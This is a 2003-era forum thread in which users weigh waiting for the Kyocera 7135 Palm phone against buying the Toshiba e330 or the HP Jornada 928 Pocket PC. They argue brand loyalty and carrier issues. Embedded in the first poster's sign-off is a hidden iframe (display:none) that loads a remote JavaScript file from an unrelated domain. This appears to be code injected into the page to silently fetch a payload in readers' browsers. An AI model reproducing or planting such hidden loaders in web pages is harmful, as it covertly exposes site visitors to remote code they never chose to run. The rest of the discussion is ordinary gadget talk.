+ Reply to Thread

7135...I give up

If the 7135 was released when it was supposed 2 be, I would not be in this situation. I wanted it. I love my 6035. And now I want color.

i have been eyeing the I-330. Yeah I know. it doesn' have an expansion slot, but I only used half of the 8mb from the 6035.

But I think I've found a new love. The Hp Jornada 928. Yes it's a pda/phone hybrid with all the capabilities of the 7135 and more. And get this...it even has a release date of 3-1-2003.

So help me guys. Any reason why i hould wait for the 7135 any longer. The I-330 is at the store and the 928 is extremely promising. So it's palm vs Microsoft Pocket PC.

I used to have a jornada and I love it. But i didn't miss carrying around 2 objects. So now that the jornada has caught up. Maybe it's time I return home.

Denn<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Denn

Don't do it! MS is the devil!

Just buy a 7135 from getconnected.com and activate it with VZ!

Don't sell your soul to HP and Evil Bill!
    Sorry, but I no longer make 7135 headset adapters.

Re: 7135...I give up

Originally posted by dennis_galloway
    The Hp Jornada 928. Yes it's a pda/phone hybrid with all the capabilities of the 7135 and more. And get this...it even has a release date of 3-1-2003.
    Do you have any links supporting that? "resurrected" would be a better term than "release date" as I thought it was released in the UK on vodafone, then cancelled, perhaps because it didn't fit into the new merged hp/compaq strategy.
    David

Originally posted by coolcat
    Don't do it! MS is the devil! Don't sell your soul to HP and Evil Bill!
    That may be true, however, in the end it may come down to how bad msft wants to win this one. Palm and Palmsource have to stand on their own to survive whereas msft can through all the $ it wants at their ppc development taken from their new higher windows os revenue thanks to wpa (windows product activation) which won't allow individuals and companies to use a single windows os cd for multiple installations.

I've seen a flash of a samsung phone that's similar to the i700 only it has an internal tv tuner as well. While it's only for Korea (figures) it goes to show that palm licensees may get outclassed in a year or two if they don't get on the ball and quit offering 33mhz processors and two year old operating systems. The plethora of palm software isn't soo big if you figure that a search for "clock" on palmgear yeilds 293 entries. Well, a palm can show you what time it is already. Take out all the dupes from the sum of all palm software, and how many unique titles are left?
    David

here's the link

bargaindpda.com

And thanks 4 the suggestion cool cat, however, I'm on sprint. so buying a phone 2 get on verizon is not so easy

denn
    Denn

I500

Have you considered the Samsung I500? I know it hasn't been released yet, but neither has the 7135 or your HP model.
    Nicky